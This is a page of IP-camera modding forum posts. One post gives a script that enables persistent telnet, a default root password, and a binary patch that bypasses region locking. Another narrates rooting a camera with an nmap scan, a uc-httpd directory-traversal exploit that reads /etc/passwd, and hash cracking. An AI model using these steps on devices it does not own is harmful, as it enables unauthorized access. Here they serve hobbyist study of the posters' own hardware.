Recent Posts

1
Hacking & Modding / Re: In over my head/dumb questions
« Last post by salukikev on July 22, 2017, 04:19:41 pm »
Hi,
Sorry I didn't get a notice of this reply until I happened back here to research! That is a lot of info to process! It certainly looks like there's a lot to learn! Isn't there an option to use "pelco" protocol which addresses this directly (without having to "hack" anything?). Also, I picked this camera board specifically due to its diminutive size on a single board (32mm x 32mm). If there are any more appropriate camera boards which are of this size or smaller I would be very interested in buying one of those instead!
Thanks!

ps.  It seems to be drastically difficult to post responses here as I have first a captcha, and then three additional questions, at least one of which is very difficult/ambiguous to answer.  For example:  "What number comes before Yan An Zhong lu in the address? (use numbers):"   What- the URL address?  The mailing address?   Nothing is listed here on this page or the home page of the site.  I have to repost this until I get a manageable question and this seems to happen each time even though I'm logged in!
2
Site Announcements / Forum, software updates
« Last post by admin on July 14, 2017, 03:20:24 am »
Updated forum software to 2.0.14, changed default template to the traditional default, as I need to work on the old template to make it compatible.

Added some boards for the XiaoMi camera range, as I have some, and will probably fiddle with them!

3
Xiaoyi Camera (小蚁) / Region lock fix
« Last post by admin on July 14, 2017, 03:08:48 am »
From my page here - http://www.computersolutions.cn/blog/2016/09/xiaomi-camera-bs-region-locking-fix/

Essentially -

Enable telnet.
Login.
Kill the watchdog, and kill the camera app.
Rename the API call to check the country.

-----
Create a folder named test on an SD card.
Create a plain text file called equip_test.sh in that folder, and add the following bash script:

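Code:
#!/bin/sh
# Runs from the test folder on the SD card when the camera boots.
# Telnet: install an init script that starts telnetd on every boot
if [ ! -f "/etc/init.d/S88telnet" ]; then
    echo "#!/bin/sh" > /etc/init.d/S88telnet
    echo "telnetd &" >> /etc/init.d/S88telnet
    chmod 755 /etc/init.d/S88telnet
fi
dr=$(dirname "$0")
# fix bootcycle: rename this script so it does not run (and reboot) again
mv "$dr/equip_test.sh" "$dr/equip_test.sh.moved"
reboot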

The script will enable telnet on the camera, and then rename the script so it doesn’t run again on the next boot.

Stick the prepared card into the camera, power on, and it should reboot (twice).
If you check the open ports on the camera ip you should now see port 23 (telnet) is open.

Login with the default user/pass (as below) via telnet

User: root
Password: 1234qwer

Once telnet’d in, enter the following, line by line –

Find and kill the watchdog process

killall watch_process

Find and kill /home/cloud process so we can edit it without the watchdog watch_process restarting it

killall cloud

Change the check within /home/cloud executable to query a fake domain so it never returns a failure, then reboot.


Code:
sed -i 's|api.xiaoyi.com/v4/ipc/check_did|api.xiaoyi.foo/v4/ipc/check_did|g' /home/cloud
reboot
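
An added example, not part of the original post or the linked blog: the sed edit above is safe on a binary only because api.xiaoyi.foo is exactly as long as api.xiaoyi.com, so no byte offsets move. The sketch below wraps the same substitution with a length check, a backup and a size check; safe_patch, make_sample and the sample bytes are constructed for illustration.

```sh
#!/bin/sh
# Added example: same-length string patch of a binary, with backup and checks.
# Usage: safe_patch FILE OLD NEW
safe_patch() {
    file=$1; old=$2; new=$3

    # A longer or shorter replacement would shift every later byte of the binary.
    [ "${#old}" -eq "${#new}" ] || { echo "length mismatch" >&2; return 2; }

    # Refuse to touch a file that does not contain the string.
    LC_ALL=C grep -qF -- "$old" "$file" || { echo "string not found" >&2; return 3; }

    # Keep the untouched original next to the patched file.
    cp -p "$file" "$file.orig" || return 4
    before=$(wc -c < "$file.orig" | tr -d ' ')

    # Same substitution as in the post (OLD is a sed regex, so "." matches any
    # character). Writing into the existing file keeps its mode bits.
    LC_ALL=C sed "s|$old|$new|g" "$file.orig" > "$file"

    after=$(wc -c < "$file" | tr -d ' ')
    if [ "$before" -ne "$after" ] || LC_ALL=C grep -qF -- "$old" "$file"; then
        echo "verification failed, restoring original" >&2
        cp -p "$file.orig" "$file"
        return 5
    fi
    echo "patched $file: $after bytes, backup in $file.orig"
}

# Constructed stand-in for the camera binary: binary bytes around the URL.
make_sample() {
    printf 'ELF\001\002\000https://api.xiaoyi.com/v4/ipc/check_did\000tail\n' > "$1"
}

# Demo on a temporary file (on the camera FILE would be /home/cloud).
demo=$(mktemp)
make_sample "$demo"
safe_patch "$demo" 'api.xiaoyi.com/v4/ipc/check_did' 'api.xiaoyi.foo/v4/ipc/check_did'
rm -f "$demo" "$demo.orig"
```
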
5
Hacking & Modding / Re: In over my head/dumb questions
« Last post by admin on July 14, 2017, 02:13:09 am »
Really depends on the board you have, and what gpio's are available to use, and how much flash / ram (for user space software etc).

Do you have the Hi3518e SoC SDK?

You'll need the SDK to get started, and compile a rom with kernel, userfs etc
Maybe the supplier will give you a ready to use kernel/rom/userfs that you can start from.

You'll need to have a uBoot on the board. Hopefully it will have one already, otherwise you'll also need an SPI flash programmer to program the uBoot.
You'll need to be able to set up a crosscompiler environment (suggest use Docker or similar virtualized system to set up, then you can migrate easily).
You'll need to unpack the SDK, then be able to compile kernel.
You'll need to learn how to set up rom in flash.

Suggest read the uCLinux posts from 2011 where I talk about similar things. It's relevant, although not 100% relevant to your particular board.


Also suggest reading other people's posts, e.g. https://felipe.astroza.cl/hacking-hi3518-based-ip-camera/

Good luck.

Might want to think about using something like an ESP8266 for your gimbal to control sensors, as that has wifi, and they're dirt cheap.
6
Firmware / Hi 3518E BLK18E-0012 50h10PE-WP Firmware
« Last post by winek0 on July 09, 2017, 04:00:13 am »
Hi, I have a problem with my camera: after the update it does not start. I'm looking for firmware for it.



U-Boot 2010.06-svn (Oct 14 2015 - 15:07:23)

DRAM:  256 MiB
Check spi flash controller v350... Found
Spi(cs1) ID: 0xC2 0x20 0x17 0xC2 0x20 0x17
Spi(cs1): Block:64KB Chip:8MB Name:"MX25L6406E"
envcrc 0xd2097268
ENV_SIZE = 0xfffc
In:    serial
Out:   serial
Err:   serial
Press Ctrl+C to stop autoboot
CFG_BOOT_ADDR:0x58040000
8192 KiB hi_sfc at 0:0 is now current device

### boot load complete: 1973968 bytes loaded to 0x82000000
### SAVE TO 80008000 !
## Booting kernel from Legacy Image at 82000000 ...
   Image Name:   linux
   Image Type:   ARM Linux Kernel Image (uncompressed)
   Data Size:    1973904 Bytes = 1.9 MiB
   Load Address: 80008000
   Entry Point:  80008000


load=0x80008000,_bss_end=80829828,image_end=801e9e90,boot_sp=807c7168
   Loading Kernel Image ... OK
OK

Starting kernel ...

Uncompressing Linux... done, booting the kernel.



7
Hacking & Modding / In over my head/dumb questions
« Last post by salukikev on July 05, 2017, 01:55:27 am »
Hi guys,
I'm delighted to have discovered this forum recently as I'm expecting the arrival of a 32x32mm 720P IP camera tomorrow featuring the Hi3518E (https://www.alibaba.com/product-detail/720P-CMOS-Onivf-IP-module-H_60352228981.html).

I've read this is a popular configuration to access and hack the linux OS.   Unfortunately this is one part of a much larger project and I'm a terrible programmer only just getting familiar with Linux itself.  My focus has always been on mechanical items, but I'm familiar enough with electronics- this is still very new territory for me.  So apologies in advance for any ignorant questions.

1. The system that controls this camera will have two sets of coordinates for its 2 axis gimbal system.
2. Self-contained values for X & Z axis motors, I say self contained because values need not come from the Ethernet port, but rather from a MPU6050 sensor or similar, so yes- it will be trying to level itself out continuously.
3. The other set of values WILL need to come from the ethernet connection and they will constitute an offset value so that the camera can be driven to move from the other (leveling) values.

I realize that it is almost certain that I will need a separate microcontroller to handle this, but I thought that maybe at least the 2nd set of values could come through the IP camera board since it will already be networked, and will require negligible bandwidth, and I could thusly avoid all the complication of adding a separate board, ethernet hub/switch etc. etc. only to get a few PWM signals in there.  Space is at a premium for this application.

Short of that, I arrived here reading up on ways to reduce video latency.  This particular IP camera will go through a 10/100 mini ethernet media converter (fiber optic 9/125) as well.  Due to aforementioned size constraints I'm settling for 720p at 30fps even though I was shooting for at least 1080p.  This board in particular is only 32x32mm in physical size, so I've got that going for me, which is nice.   I'd welcome any suggestions on finding something smaller or higher resolution at that size (or actually a round PCB would be nice even though I don't expect to find that).   OR something of similar size with a remote image sensor (via flat ribbon cable).

Anyway, as you can see, I have a lot of different directions I can move on this project.  I'm funding this out of pocket right now, but if things work out I could turn a profit someday.  As such, I'd be willing to hire someone to help with this or possibly some equity arrangement- but short of that, I'd surely love some free advice and guidance before I spiral off on a tangent here.

Anyway, thanks in advance for any tips to get me moving toward a viable solution!   have a great day!
-Kevin


8
General Discussion / Re: Secure Methods Using PHP To display Your IP Camera
« Last post by OldRadioGuy on July 03, 2017, 05:49:26 pm »
Don's website is down.  Anybody have a copy of SecureImageDisplayV50.zip available?
9
Help / How I got root on my camera
« Last post by tanranger on July 02, 2017, 04:22:42 pm »
My camera uses a mobile app (Showmo) to use a China based cloud service for all device control. I tried to http directly to the camera with my browser but all I get is a blank listing of "Index of /mnt/web/".

So I did a bit of sleuthing and found this:

https://nmap.org/book/vscan.html

So I tried that out:

Code:
$ nmap -sV -T4 -F my.camera.ip.address
This reports the following:

Code:
Starting Nmap 7.01 ( https://nmap.org ) at 2017-07-02 15:41 EDT
Nmap scan report for 192.168.1.121
Host is up (0.89s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet  BusyBox telnetd
80/tcp open  http    uc-httpd 1.0.0
Service Info: Host: IPC365

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.67 seconds

So it's running uc-httpd 1.0.0.  Well a bit of googling later I come to learn that this is a httpd with a directory traversal bug.

https://packetstormsecurity.com/files/142131/XiongMai-uc-http-1.0.0-Local-File-Inclusion-Directory-Traversal.html

And there's a little python program provided to attack my camera.

Code:
$ python2 pwn.py http://192.168.1.121
[+] uc-httpd 0day exploiter [+]
[+] usage: python pwn.py http://<target_ip>
[+] File or Directory: /etc/passwd
Exploiting.....


root:my-password-hash-here::/root:/bin/sh

So then I fed this into johntheripper with gpu acceleration and I got my root password in a few minutes.

Code:
$ telnet 192.168.1.121
Trying 192.168.1.121...
Connected to 192.168.1.121.
Escape character is '^]'.
IPC365 login: root
Password:
login: can't chdir to home directory '/root'
Welcome to

    _____    __      ___       __     ___       _     _    _
   |  ___|  /  \    / __ \    /  \   |  _ \    /  \   \ \ / /
   | |___  / /\ \  | /__\ \  / /\ \  | | \ |  / /\ \   \ V /
   |  ___|| |__| | |  _   / | |__| | | | | | | |__| |   \ /
   | |    |  __  | | |  \ \ |  __  | | |_/ / |  __  |   | |
   |_|    |_|  |_| |_|   \_\|_|  |_| |___ /  |_|  |_|   |_|

For further information check:
http://www.faraday.com/



BusyBox v1.19.4 (2014-12-19 12:49:44 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

So I poked around and learned this is a GM8136 device.

I noticed that an SDK for a similar chip was available on openipcam, so I used that filename as an example of the naming convention and searched for "GM8136 SDK release v1.0.rar" and discovered dozens of download links. I had to guess what a download button looks like in Chinese, but I figured it out.

Following the instructions in the SDK, I was able to crosscompile a full copy of busybox and get it into my /tmp/ directory and it works beautifully.

Poking around, I've learned the following:

Essentially all of the application code lives in an encrypted (blowfish-448) ELF which uses a common unix command as its filename (possibly to make googling harder). The encrypted ELF has formatted the SD card to the WFS0.4 encrypted filesystem so it can no longer be mounted and used to store my own application data between reboots. Also, whenever I try to kill the encrypted ELF process, the camera promptly reboots after a short delay.

So the punchline is that I have root over telnet, but I cannot access the camera output, my images, or my videos. I can run my own code, but I'm stuck for now with this mystery app that may or may not be adequately secured and could conceivably already be compromised with no way for me to tell.

One bit of good news is that /proc/config.gz is present if I decided to try to roll my own kernel.

So that's how I got this far. I hope my experience helps others to explore their own cameras.

Anyway, what now?
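
An added example, not part of the original post: the two findings in the scan above (BusyBox telnetd on 23/tcp and uc-httpd 1.0.0 on 80/tcp) can be picked out of nmap -sV text output automatically when auditing the cameras on your own network. audit_nmap, sample_scan and the second host in the sample are constructed; the first report repeats the lines from the post.

```sh
#!/bin/sh
# Added example: flag risky camera services in `nmap -sV` text output.
# Reads one or more scan reports on stdin, prints "host port finding" lines.
audit_nmap() {
    awk '
    # Remember which host the following port lines belong to.
    /^Nmap scan report for / { host = $NF; gsub(/[()]/, "", host); next }

    # Port table rows look like: 23/tcp open  telnet  BusyBox telnetd
    $2 == "open" && $1 ~ /^[0-9]+\/tcp$/ {
        ver = ""
        for (i = 4; i <= NF; i++) ver = ver (ver == "" ? "" : " ") $i
        if ($3 == "telnet")
            print host, $1, "telnet exposed (" ver "): cleartext login service"
        if (ver == "uc-httpd 1.0.0")
            print host, $1, "uc-httpd 1.0.0: directory traversal reported for this version"
    }'
}

# First report: lines from the post. Second report: constructed, no findings.
sample_scan() {
    cat <<'EOF'
Nmap scan report for 192.168.1.121
Host is up (0.89s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet  BusyBox telnetd
80/tcp open  http    uc-httpd 1.0.0
Service Info: Host: IPC365

Nmap scan report for nas.lan (192.168.1.50)
Host is up (0.01s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
EOF
}

sample_scan | audit_nmap
```
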
10
Firmware / Re: Hi3516 Unknown command 'root' - try 'help'
« Last post by anil_argede on June 28, 2017, 03:23:33 am »
I'm pretty new to that module. I don't know how I do. Can you help me if you know something?

Also I want to use this module for image processing. There are some OS in that. How can I change some files in it? I wanna do some image processing with it. I need to do modification and add some code to OS. Can I do that?